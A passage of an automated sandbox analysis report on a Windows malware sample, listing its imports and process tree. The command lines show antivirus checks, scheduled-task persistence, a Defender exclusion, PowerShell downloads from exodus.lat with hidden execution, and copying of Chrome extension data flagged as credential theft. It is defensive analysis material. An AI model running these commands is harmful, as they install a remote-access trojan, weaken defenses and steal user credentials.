                                                                                            KERNEL32.dllSetFileTime, CompareFileTime, SearchPathW, GetShortPathNameW, GetFullPathNameW, MoveFileW, SetCurrentDirectoryW, GetFileAttributesW, GetLastError, CreateDirectoryW, SetFileAttributesW, Sleep, GetTickCount, GetFileSize, GetModuleFileNameW, GetCurrentProcess, CopyFileW, ExitProcess, GetWindowsDirectoryW, GetTempPathW, GetCommandLineW, SetErrorMode, lstrcpynA, CloseHandle, lstrcpynW, GetDiskFreeSpaceW, GlobalUnlock, GlobalLock, CreateThread, LoadLibraryW, CreateProcessW, lstrcmpiA, CreateFileW, GetTempFileNameW, lstrcatW, GetProcAddress, LoadLibraryA, GetModuleHandleA, OpenProcess, lstrcpyW, GetVersionExW, GetSystemDirectoryW, GetVersion, lstrcpyA, RemoveDirectoryW, lstrcmpA, lstrcmpiW, lstrcmpW, ExpandEnvironmentStringsW, GlobalAlloc, WaitForSingleObject, GetExitCodeProcess, GlobalFree, GetModuleHandleW, LoadLibraryExW, FreeLibrary, WritePrivateProfileStringW, GetPrivateProfileStringW, WideCharToMultiByte, lstrlenA, MulDiv, WriteFile, ReadFile, MultiByteToWideChar, SetFilePointer, FindClose, FindNextFileW, FindFirstFileW, DeleteFileW, lstrlenW
                                                                                            USER32.dllGetAsyncKeyState, IsDlgButtonChecked, ScreenToClient, GetMessagePos, CallWindowProcW, IsWindowVisible, LoadBitmapW, CloseClipboard, SetClipboardData, EmptyClipboard, OpenClipboard, TrackPopupMenu, GetWindowRect, AppendMenuW, CreatePopupMenu, GetSystemMetrics, EndDialog, EnableMenuItem, GetSystemMenu, SetClassLongW, IsWindowEnabled, SetWindowPos, DialogBoxParamW, CheckDlgButton, CreateWindowExW, SystemParametersInfoW, RegisterClassW, SetDlgItemTextW, GetDlgItemTextW, MessageBoxIndirectW, CharNextA, CharUpperW, CharPrevW, wvsprintfW, DispatchMessageW, PeekMessageW, wsprintfA, DestroyWindow, CreateDialogParamW, SetTimer, SetWindowTextW, PostQuitMessage, SetForegroundWindow, ShowWindow, wsprintfW, SendMessageTimeoutW, LoadCursorW, SetCursor, GetWindowLongW, GetSysColor, CharNextW, GetClassInfoW, ExitWindowsEx, IsWindow, GetDlgItem, SetWindowLongW, LoadImageW, GetDC, EnableWindow, InvalidateRect, SendMessageW, DefWindowProcW, BeginPaint, GetClientRect, FillRect, DrawTextW, EndPaint, FindWindowExW
                                                                                            GDI32.dllSetBkColor, GetDeviceCaps, DeleteObject, CreateBrushIndirect, CreateFontIndirectW, SetBkMode, SetTextColor, SelectObject
                                                                                            SHELL32.dllSHBrowseForFolderW, SHGetPathFromIDListW, SHGetFileInfoW, ShellExecuteW, SHFileOperationW, SHGetSpecialFolderLocation
                                                                                            ADVAPI32.dllRegEnumKeyW, RegOpenKeyExW, RegCloseKey, RegDeleteKeyW, RegDeleteValueW, RegCreateKeyExW, RegSetValueExW, RegQueryValueExW, RegEnumValueW
                                                                                            COMCTL32.dllImageList_AddMasked, ImageList_Destroy, ImageList_Create
                                                                                            ole32.dllCoTaskMemFree, OleInitialize, OleUninitialize, CoCreateInstance
                                                                                            VERSION.dllGetFileVersionInfoSizeW, GetFileVersionInfoW, VerQueryValueW

                                                                                            Possible Origin

                                                                                            Language of compilation systemCountry where language is spokenMap
                                                                                            EnglishUnited States

                                                                                            Network Behavior

                                                                                            Skipped network analysis since the amount of network traffic is too extensive. Please download the PCAP and check manually.

                                                                                            Statistics

                                                                                            CPU Usage

                                                                                            Click to jump to process

                                                                                            Memory Usage

                                                                                            Click to jump to process

                                                                                            High Level Behavior Distribution

                                                                                            Click to dive into process behavior distribution

                                                                                            Behavior

                                                                                            Click to jump to process

                                                                                            System Behavior

                                                                                            General

                                                                                            Target ID:0
                                                                                            Start time:03:32:41
                                                                                            Start date:06/12/2024
                                                                                            Path:C:\Users\user\Desktop\DM6vAAgoCw.exe
                                                                                            Wow64 process (32bit):true
                                                                                            Commandline:"C:\Users\user\Desktop\DM6vAAgoCw.exe"
                                                                                            Imagebase:0x400000
                                                                                            File size:7'284'070 bytes
                                                                                            MD5 hash:A67E34BAACFCA98F323981D3B0087F3B
                                                                                            Has elevated privileges:true
                                                                                            Has administrator privileges:true
                                                                                            Programmed in:C, C++ or other language
                                                                                            Reputation:low
                                                                                            Has exited:true

                                                                                            General

                                                                                            Target ID:2
                                                                                            Start time:03:32:42
                                                                                            Start date:06/12/2024
                                                                                            Path:C:\Windows\SysWOW64\cmd.exe
                                                                                            Wow64 process (32bit):true
                                                                                            Commandline:"C:\Windows\System32\cmd.exe" /c copy Audit Audit.cmd && Audit.cmd
                                                                                            Imagebase:0x1c0000
                                                                                            File size:236'544 bytes
                                                                                            MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                            Has elevated privileges:true
                                                                                            Has administrator privileges:true
                                                                                            Programmed in:C, C++ or other language
                                                                                            Reputation:high
                                                                                            Has exited:true

                                                                                            General

                                                                                            Target ID:3
                                                                                            Start time:03:32:42
                                                                                            Start date:06/12/2024
                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                            Wow64 process (32bit):false
                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                            Imagebase:0x7ff66e660000
                                                                                            File size:862'208 bytes
                                                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                            Has elevated privileges:true
                                                                                            Has administrator privileges:true
                                                                                            Programmed in:C, C++ or other language
                                                                                            Reputation:high
                                                                                            Has exited:true

                                                                                            General

                                                                                            Target ID:4
                                                                                            Start time:03:32:43
                                                                                            Start date:06/12/2024
                                                                                            Path:C:\Windows\SysWOW64\tasklist.exe
                                                                                            Wow64 process (32bit):true
                                                                                            Commandline:tasklist
                                                                                            Imagebase:0xeb0000
                                                                                            File size:79'360 bytes
                                                                                            MD5 hash:0A4448B31CE7F83CB7691A2657F330F1
                                                                                            Has elevated privileges:true
                                                                                            Has administrator privileges:true
                                                                                            Programmed in:C, C++ or other language
                                                                                            Reputation:high
                                                                                            Has exited:true

                                                                                            General

                                                                                            Target ID:5
                                                                                            Start time:03:32:43
                                                                                            Start date:06/12/2024
                                                                                            Path:C:\Windows\SysWOW64\findstr.exe
                                                                                            Wow64 process (32bit):true
                                                                                            Commandline:findstr /I "wrsa opssvc"
                                                                                            Imagebase:0x820000
                                                                                            File size:29'696 bytes
                                                                                            MD5 hash:F1D4BE0E99EC734376FDE474A8D4EA3E
                                                                                            Has elevated privileges:true
                                                                                            Has administrator privileges:true
                                                                                            Programmed in:C, C++ or other language
                                                                                            Reputation:high
                                                                                            Has exited:true

                                                                                            General

                                                                                            Target ID:6
                                                                                            Start time:03:32:43
                                                                                            Start date:06/12/2024
                                                                                            Path:C:\Windows\SysWOW64\tasklist.exe
                                                                                            Wow64 process (32bit):true
                                                                                            Commandline:tasklist
                                                                                            Imagebase:0xeb0000
                                                                                            File size:79'360 bytes
                                                                                            MD5 hash:0A4448B31CE7F83CB7691A2657F330F1
                                                                                            Has elevated privileges:true
                                                                                            Has administrator privileges:true
                                                                                            Programmed in:C, C++ or other language
                                                                                            Reputation:high
                                                                                            Has exited:true

                                                                                            General

                                                                                            Target ID:7
                                                                                            Start time:03:32:43
                                                                                            Start date:06/12/2024
                                                                                            Path:C:\Windows\SysWOW64\findstr.exe
                                                                                            Wow64 process (32bit):true
                                                                                            Commandline:findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth"
                                                                                            Imagebase:0x820000
                                                                                            File size:29'696 bytes
                                                                                            MD5 hash:F1D4BE0E99EC734376FDE474A8D4EA3E
                                                                                            Has elevated privileges:true
                                                                                            Has administrator privileges:true
                                                                                            Programmed in:C, C++ or other language
                                                                                            Reputation:high
                                                                                            Has exited:true

                                                                                            General

                                                                                            Target ID:8
                                                                                            Start time:03:32:44
                                                                                            Start date:06/12/2024
                                                                                            Path:C:\Windows\SysWOW64\cmd.exe
                                                                                            Wow64 process (32bit):true
                                                                                            Commandline:cmd /c md 491505
                                                                                            Imagebase:0x1c0000
                                                                                            File size:236'544 bytes
                                                                                            MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                            Has elevated privileges:true
                                                                                            Has administrator privileges:true
                                                                                            Programmed in:C, C++ or other language
                                                                                            Reputation:high
                                                                                            Has exited:true

                                                                                            General

                                                                                            Target ID:9
                                                                                            Start time:03:32:44
                                                                                            Start date:06/12/2024
                                                                                            Path:C:\Windows\SysWOW64\cmd.exe
                                                                                            Wow64 process (32bit):true
                                                                                            Commandline:cmd /c copy /b ..\Dentists + ..\Flavor + ..\Disturbed + ..\Artistic + ..\Justice + ..\Proceeds + ..\Zip + ..\Soundtrack + ..\Revenue B
                                                                                            Imagebase:0x1c0000
                                                                                            File size:236'544 bytes
                                                                                            MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                            Has elevated privileges:true
                                                                                            Has administrator privileges:true
                                                                                            Programmed in:C, C++ or other language
                                                                                            Reputation:high
                                                                                            Has exited:true

                                                                                            General

                                                                                            Target ID:10
                                                                                            Start time:03:32:44
                                                                                            Start date:06/12/2024
                                                                                            Path:C:\Users\user\AppData\Local\Temp\491505\Dr.com
                                                                                            Wow64 process (32bit):true
                                                                                            Commandline:Dr.com B
                                                                                            Imagebase:0xd00000
                                                                                            File size:893'608 bytes
                                                                                            MD5 hash:6EE7DDEBFF0A2B78C7AC30F6E00D1D11
                                                                                            Has elevated privileges:true
                                                                                            Has administrator privileges:true
                                                                                            Programmed in:C, C++ or other language
                                                                                            Antivirus matches:
                                                                                            • Detection: 3%, ReversingLabs
                                                                                            Reputation:moderate
                                                                                            Has exited:false

                                                                                            General

                                                                                            Target ID:11
                                                                                            Start time:03:32:44
                                                                                            Start date:06/12/2024
                                                                                            Path:C:\Windows\SysWOW64\choice.exe
                                                                                            Wow64 process (32bit):true
                                                                                            Commandline:choice /d y /t 15
                                                                                            Imagebase:0x4a0000
                                                                                            File size:28'160 bytes
                                                                                            MD5 hash:FCE0E41C87DC4ABBE976998AD26C27E4
                                                                                            Has elevated privileges:true
                                                                                            Has administrator privileges:true
                                                                                            Programmed in:C, C++ or other language
                                                                                            Reputation:moderate
                                                                                            Has exited:true

                                                                                            General

                                                                                            Target ID:12
                                                                                            Start time:03:32:46
                                                                                            Start date:06/12/2024
                                                                                            Path:C:\Windows\SysWOW64\cmd.exe
                                                                                            Wow64 process (32bit):true
                                                                                            Commandline:cmd /c schtasks.exe /create /tn "West" /tr "wscript //B 'C:\Users\user\AppData\Local\CreativePixel Tech\ApolloPro.js'" /sc daily /mo 1 /ri 3 /du 23:57 /F /RL HIGHEST
                                                                                            Imagebase:0x1c0000
                                                                                            File size:236'544 bytes
                                                                                            MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                            Has elevated privileges:false
                                                                                            Has administrator privileges:false
                                                                                            Programmed in:C, C++ or other language
                                                                                            Has exited:true

                                                                                            General

                                                                                            Target ID:13
                                                                                            Start time:03:32:46
                                                                                            Start date:06/12/2024
                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                            Wow64 process (32bit):false
                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                            Imagebase:0x7ff66e660000
                                                                                            File size:862'208 bytes
                                                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                            Has elevated privileges:false
                                                                                            Has administrator privileges:false
                                                                                            Programmed in:C, C++ or other language
                                                                                            Has exited:true

                                                                                            General

                                                                                            Target ID:14
                                                                                            Start time:03:32:46
                                                                                            Start date:06/12/2024
                                                                                            Path:C:\Windows\SysWOW64\schtasks.exe
                                                                                            Wow64 process (32bit):true
                                                                                            Commandline:schtasks.exe /create /tn "West" /tr "wscript //B 'C:\Users\user\AppData\Local\CreativePixel Tech\ApolloPro.js'" /sc daily /mo 1 /ri 3 /du 23:57 /F /RL HIGHEST
                                                                                            Imagebase:0xa40000
                                                                                            File size:187'904 bytes
                                                                                            MD5 hash:48C2FE20575769DE916F48EF0676A965
                                                                                            Has elevated privileges:false
                                                                                            Has administrator privileges:false
                                                                                            Programmed in:C, C++ or other language
                                                                                            Has exited:true

                                                                                            General

                                                                                            Target ID:15
                                                                                            Start time:03:32:47
                                                                                            Start date:06/12/2024
                                                                                            Path:C:\Windows\SysWOW64\schtasks.exe
                                                                                            Wow64 process (32bit):true
                                                                                            Commandline:schtasks.exe /create /tn "ApolloPro" /tr "wscript //B 'C:\Users\user\AppData\Local\CreativePixel Tech\ApolloPro.js'" /sc onlogon /F /RL HIGHEST
                                                                                            Imagebase:0xa40000
                                                                                            File size:187'904 bytes
                                                                                            MD5 hash:48C2FE20575769DE916F48EF0676A965
                                                                                            Has elevated privileges:true
                                                                                            Has administrator privileges:true
                                                                                            Programmed in:C, C++ or other language
                                                                                            Has exited:true

                                                                                            General

                                                                                            Target ID:16
                                                                                            Start time:03:32:47
                                                                                            Start date:06/12/2024
                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                            Wow64 process (32bit):false
                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                            Imagebase:0x7ff66e660000
                                                                                            File size:862'208 bytes
                                                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                            Has elevated privileges:true
                                                                                            Has administrator privileges:true
                                                                                            Programmed in:C, C++ or other language
                                                                                            Has exited:true

                                                                                            General

                                                                                            Target ID:17
                                                                                            Start time:03:32:48
                                                                                            Start date:06/12/2024
                                                                                            Path:C:\Windows\System32\wscript.exe
                                                                                            Wow64 process (32bit):false
                                                                                            Commandline:C:\Windows\system32\wscript.EXE //B "C:\Users\user\AppData\Local\CreativePixel Tech\ApolloPro.js"
                                                                                            Imagebase:0x7ff672ef0000
                                                                                            File size:170'496 bytes
                                                                                            MD5 hash:A47CBE969EA935BDD3AB568BB126BC80
                                                                                            Has elevated privileges:true
                                                                                            Has administrator privileges:true
                                                                                            Programmed in:C, C++ or other language
                                                                                            Has exited:true

                                                                                            General

                                                                                            Target ID:18
                                                                                            Start time:03:32:49
                                                                                            Start date:06/12/2024
                                                                                            Path:C:\Users\user\AppData\Local\CreativePixel Tech\ApolloPro.scr
                                                                                            Wow64 process (32bit):true
                                                                                            Commandline:"C:\Users\user\AppData\Local\CreativePixel Tech\ApolloPro.scr" "C:\Users\user\AppData\Local\CreativePixel Tech\E"
                                                                                            Imagebase:0x630000
                                                                                            File size:893'608 bytes
                                                                                            MD5 hash:6EE7DDEBFF0A2B78C7AC30F6E00D1D11
                                                                                            Has elevated privileges:true
                                                                                            Has administrator privileges:true
                                                                                            Programmed in:C, C++ or other language
                                                                                            Antivirus matches:
                                                                                            • Detection: 3%, ReversingLabs
                                                                                            Has exited:true

                                                                                            General

                                                                                            Target ID:22
                                                                                            Start time:03:35:19
                                                                                            Start date:06/12/2024
                                                                                            Path:C:\Users\user\AppData\Local\Temp\491505\RegAsm.exe
                                                                                            Wow64 process (32bit):true
                                                                                            Commandline:C:\Users\user\AppData\Local\Temp\491505\RegAsm.exe
                                                                                            Imagebase:0x3e0000
                                                                                            File size:65'440 bytes
                                                                                            MD5 hash:0D5DF43AF2916F47D00C1573797C1A13
                                                                                            Has elevated privileges:true
                                                                                            Has administrator privileges:true
                                                                                            Programmed in:C, C++ or other language
                                                                                            Yara matches:
                                                                                            • Rule: JoeSecurity_OrcusRat, Description: Yara detected Orcus RAT, Source: 00000016.00000002.4561895270.00000000007C2000.00000040.00000400.00020000.00000000.sdmp, Author: J from THL <j@techhelplist.com> with thx to MalwareHunterTeam
                                                                                            • Rule: RAT_Orcus, Description: unknown, Source: 00000016.00000002.4561895270.00000000007C2000.00000040.00000400.00020000.00000000.sdmp, Author: J from THL <j@techhelplist.com> with thx to MalwareHunterTeam
                                                                                            • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000016.00000002.4603685340.0000000003B81000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                            • Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 00000016.00000002.4571175471.0000000002D1D000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                            Antivirus matches:
                                                                                            • Detection: 0%, ReversingLabs
                                                                                            Has exited:false

                                                                                            General

                                                                                            Target ID:24
                                                                                            Start time:03:35:34
                                                                                            Start date:06/12/2024
                                                                                            Path:C:\Windows\SysWOW64\cmd.exe
                                                                                            Wow64 process (32bit):true
                                                                                            Commandline:C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\download.bat" "
                                                                                            Imagebase:0x1c0000
                                                                                            File size:236'544 bytes
                                                                                            MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                            Has elevated privileges:true
                                                                                            Has administrator privileges:true
                                                                                            Programmed in:C, C++ or other language
                                                                                            Has exited:true

                                                                                            General

                                                                                            Target ID:25
                                                                                            Start time:03:35:34
                                                                                            Start date:06/12/2024
                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                            Wow64 process (32bit):false
                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                            Imagebase:0x7ff66e660000
                                                                                            File size:862'208 bytes
                                                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                            Has elevated privileges:true
                                                                                            Has administrator privileges:true
                                                                                            Programmed in:C, C++ or other language
                                                                                            Has exited:true

                                                                                            General

                                                                                            Target ID:26
                                                                                            Start time:03:35:35
                                                                                            Start date:06/12/2024
                                                                                            Path:C:\Windows\SysWOW64\net.exe
                                                                                            Wow64 process (32bit):true
                                                                                            Commandline:net session
                                                                                            Imagebase:0xde0000
                                                                                            File size:47'104 bytes
                                                                                            MD5 hash:31890A7DE89936F922D44D677F681A7F
                                                                                            Has elevated privileges:true
                                                                                            Has administrator privileges:true
                                                                                            Programmed in:C, C++ or other language
                                                                                            Has exited:true

                                                                                            General

                                                                                            Target ID:27
                                                                                            Start time:03:35:35
                                                                                            Start date:06/12/2024
                                                                                            Path:C:\Windows\SysWOW64\net1.exe
                                                                                            Wow64 process (32bit):true
                                                                                            Commandline:C:\Windows\system32\net1 session
                                                                                            Imagebase:0x320000
                                                                                            File size:139'776 bytes
                                                                                            MD5 hash:2EFE6ED4C294AB8A39EB59C80813FEC1
                                                                                            Has elevated privileges:true
                                                                                            Has administrator privileges:true
                                                                                            Programmed in:C, C++ or other language
                                                                                            Has exited:true

                                                                                            General

                                                                                            Target ID:28
                                                                                            Start time:03:35:35
                                                                                            Start date:06/12/2024
                                                                                            Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                            Wow64 process (32bit):true
                                                                                            Commandline:powershell -WindowStyle Hidden -Command "Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\asm'"
                                                                                            Imagebase:0x4b0000
                                                                                            File size:433'152 bytes
                                                                                            MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                                                            Has elevated privileges:true
                                                                                            Has administrator privileges:true
                                                                                            Programmed in:C, C++ or other language
                                                                                            Has exited:true

                                                                                            General

                                                                                            Target ID:29
                                                                                            Start time:03:35:36
                                                                                            Start date:06/12/2024
                                                                                            Path:C:\Windows\SysWOW64\cmd.exe
                                                                                            Wow64 process (32bit):true
                                                                                            Commandline:C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\checkmiexe.bat" "
                                                                                            Imagebase:0x1c0000
                                                                                            File size:236'544 bytes
                                                                                            MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                            Has elevated privileges:true
                                                                                            Has administrator privileges:true
                                                                                            Programmed in:C, C++ or other language
                                                                                            Has exited:true

                                                                                            General

                                                                                            Target ID:30
                                                                                            Start time:03:35:36
                                                                                            Start date:06/12/2024
                                                                                            Path:C:\Windows\SysWOW64\cmd.exe
                                                                                            Wow64 process (32bit):true
                                                                                            Commandline:C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\runsteal.bat" "
                                                                                            Imagebase:0x1c0000
                                                                                            File size:236'544 bytes
                                                                                            MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                            Has elevated privileges:true
                                                                                            Has administrator privileges:true
                                                                                            Programmed in:C, C++ or other language
                                                                                            Has exited:true

                                                                                            General

                                                                                            Target ID:31
                                                                                            Start time:03:35:36
                                                                                            Start date:06/12/2024
                                                                                            Path:C:\Users\user\AppData\Local\Temp\smartscreen.exe
                                                                                            Wow64 process (32bit):false
                                                                                            Commandline:"C:\Users\user\AppData\Local\Temp\smartscreen.exe"
                                                                                            Imagebase:0x1eb2ab20000
                                                                                            File size:167'936 bytes
                                                                                            MD5 hash:1FED66D1F6B85BDA20FE0403CA01C9BD
                                                                                            Has elevated privileges:true
                                                                                            Has administrator privileges:true
                                                                                            Programmed in:C, C++ or other language
                                                                                            Yara matches:
                                                                                            • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 0000001F.00000002.4565494964.000001EB2C781000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                            • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 0000001F.00000000.3856204224.000001EB2AB22000.00000002.00000001.01000000.0000000D.sdmp, Author: Joe Security
                                                                                            • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: C:\Users\user\AppData\Local\Temp\smartscreen.exe, Author: Joe Security
                                                                                            Antivirus matches:
                                                                                            • Detection: 100%, Joe Sandbox ML
                                                                                            • Detection: 42%, ReversingLabs
                                                                                            Has exited:false

                                                                                            General

                                                                                            Target ID:32
                                                                                            Start time:03:35:36
                                                                                            Start date:06/12/2024
                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                            Wow64 process (32bit):false
                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                            Imagebase:0x7ff66e660000
                                                                                            File size:862'208 bytes
                                                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                            Has elevated privileges:true
                                                                                            Has administrator privileges:true
                                                                                            Programmed in:C, C++ or other language
                                                                                            Has exited:true

                                                                                            General

                                                                                            Target ID:33
                                                                                            Start time:03:35:36
                                                                                            Start date:06/12/2024
                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                            Wow64 process (32bit):false
                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                            Imagebase:0x7ff66e660000
                                                                                            File size:862'208 bytes
                                                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                            Has elevated privileges:true
                                                                                            Has administrator privileges:true
                                                                                            Programmed in:C, C++ or other language
                                                                                            Has exited:true

                                                                                            General

                                                                                            Target ID:34
                                                                                            Start time:03:35:37
                                                                                            Start date:06/12/2024
                                                                                            Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                            Wow64 process (32bit):true
                                                                                            Commandline:powershell -Command "Invoke-WebRequest -Uri 'https://exodus.lat/ss.bat' -OutFile 'C:\Users\user\AppData\Local\Temp\downloaded_script.bat' -UseBasicParsing"
                                                                                            Imagebase:0x4b0000
                                                                                            File size:433'152 bytes
                                                                                            MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                                                            Has elevated privileges:true
                                                                                            Has administrator privileges:true
                                                                                            Programmed in:C, C++ or other language
                                                                                            Has exited:true

                                                                                            General

                                                                                            Target ID:35
                                                                                            Start time:03:35:37
                                                                                            Start date:06/12/2024
                                                                                            Path:C:\Windows\SysWOW64\net.exe
                                                                                            Wow64 process (32bit):true
                                                                                            Commandline:net session
                                                                                            Imagebase:0xde0000
                                                                                            File size:47'104 bytes
                                                                                            MD5 hash:31890A7DE89936F922D44D677F681A7F
                                                                                            Has elevated privileges:true
                                                                                            Has administrator privileges:true
                                                                                            Programmed in:C, C++ or other language
                                                                                            Has exited:true

                                                                                            General

                                                                                            Target ID:36
                                                                                            Start time:03:35:37
                                                                                            Start date:06/12/2024
                                                                                            Path:C:\Windows\SysWOW64\net1.exe
                                                                                            Wow64 process (32bit):true
                                                                                            Commandline:C:\Windows\system32\net1 session
                                                                                            Imagebase:0x320000
                                                                                            File size:139'776 bytes
                                                                                            MD5 hash:2EFE6ED4C294AB8A39EB59C80813FEC1
                                                                                            Has elevated privileges:true
                                                                                            Has administrator privileges:true
                                                                                            Programmed in:C, C++ or other language
                                                                                            Has exited:true

                                                                                            General

                                                                                            Target ID:37
                                                                                            Start time:03:35:38
                                                                                            Start date:06/12/2024
                                                                                            Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                            Wow64 process (32bit):true
                                                                                            Commandline:powershell -WindowStyle Hidden -Command "Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\asm'"
                                                                                            Imagebase:0x4b0000
                                                                                            File size:433'152 bytes
                                                                                            MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                                                            Has elevated privileges:true
                                                                                            Has administrator privileges:true
                                                                                            Programmed in:C, C++ or other language
                                                                                            Has exited:true

                                                                                            General

                                                                                            Target ID:38
                                                                                            Start time:03:35:39
                                                                                            Start date:06/12/2024
                                                                                            Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                            Wow64 process (32bit):true
                                                                                            Commandline:powershell -WindowStyle Hidden -Command "& { (New-Object Net.WebClient).DownloadFile('https://exodus.lat/COMSurrogate.exe', 'C:\Users\user\AppData\Local\asm\COMSurrogate.exe') }"
                                                                                            Imagebase:0x4b0000
                                                                                            File size:433'152 bytes
                                                                                            MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                                                            Has elevated privileges:true
                                                                                            Has administrator privileges:true
                                                                                            Programmed in:C, C++ or other language
                                                                                            Has exited:true

                                                                                            General

                                                                                            Target ID:39
                                                                                            Start time:03:35:40
                                                                                            Start date:06/12/2024
                                                                                            Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                            Wow64 process (32bit):true
                                                                                            Commandline:powershell -WindowStyle Hidden -Command "& { (New-Object Net.WebClient).DownloadFile('https://exodus.lat/COMSurrogate.exe', 'C:\Users\user\AppData\Local\asm\COMSurrogate.exe') }"
                                                                                            Imagebase:0x4b0000
                                                                                            File size:433'152 bytes
                                                                                            MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                                                            Has elevated privileges:true
                                                                                            Has administrator privileges:true
                                                                                            Programmed in:C, C++ or other language
                                                                                            Has exited:true

                                                                                            General

                                                                                            Target ID:40
                                                                                            Start time:03:35:41
                                                                                            Start date:06/12/2024
                                                                                            Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                            Wow64 process (32bit):true
                                                                                            Commandline:powershell -WindowStyle Hidden -Command "Start-Process -FilePath 'C:\Users\user\AppData\Local\asm\COMSurrogate.exe' -WindowStyle Hidden"
                                                                                            Imagebase:0x4b0000
                                                                                            File size:433'152 bytes
                                                                                            MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                                                            Has elevated privileges:true
                                                                                            Has administrator privileges:true
                                                                                            Programmed in:C, C++ or other language
                                                                                            Has exited:true

                                                                                            General

                                                                                            Target ID:41
                                                                                            Start time:03:35:42
                                                                                            Start date:06/12/2024
                                                                                            Path:C:\Windows\SysWOW64\cmd.exe
                                                                                            Wow64 process (32bit):true
                                                                                            Commandline:cmd.exe /c "C:\Users\user\AppData\Local\Temp\downloaded_script.bat"
                                                                                            Imagebase:0x1c0000
                                                                                            File size:236'544 bytes
                                                                                            MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                            Has elevated privileges:true
                                                                                            Has administrator privileges:true
                                                                                            Programmed in:C, C++ or other language
                                                                                            Has exited:true

                                                                                            General

                                                                                            Target ID:42
                                                                                            Start time:03:35:42
                                                                                            Start date:06/12/2024
                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                            Wow64 process (32bit):false
                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                            Imagebase:0x7ff66e660000
                                                                                            File size:862'208 bytes
                                                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                            Has elevated privileges:true
                                                                                            Has administrator privileges:true
                                                                                            Programmed in:C, C++ or other language
                                                                                            Has exited:true

                                                                                            General

                                                                                            Target ID:43
                                                                                            Start time:03:35:42
                                                                                            Start date:06/12/2024
                                                                                            Path:C:\Windows\SysWOW64\xcopy.exe
                                                                                            Wow64 process (32bit):true
                                                                                            Commandline:xcopy /E /I "C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\*" "C:\Users\user\AppData\Local\Temp\ArchiveContents\Chrome\"
                                                                                            Imagebase:0x7a0000
                                                                                            File size:43'520 bytes
                                                                                            MD5 hash:7E9B7CE496D09F70C072930940F9F02C
                                                                                            Has elevated privileges:true
                                                                                            Has administrator privileges:true
                                                                                            Programmed in:C, C++ or other language
                                                                                            Yara matches:
                                                                                            • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000002B.00000002.3921696825.000000000050E000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                            • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000002B.00000002.3921696825.0000000000500000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
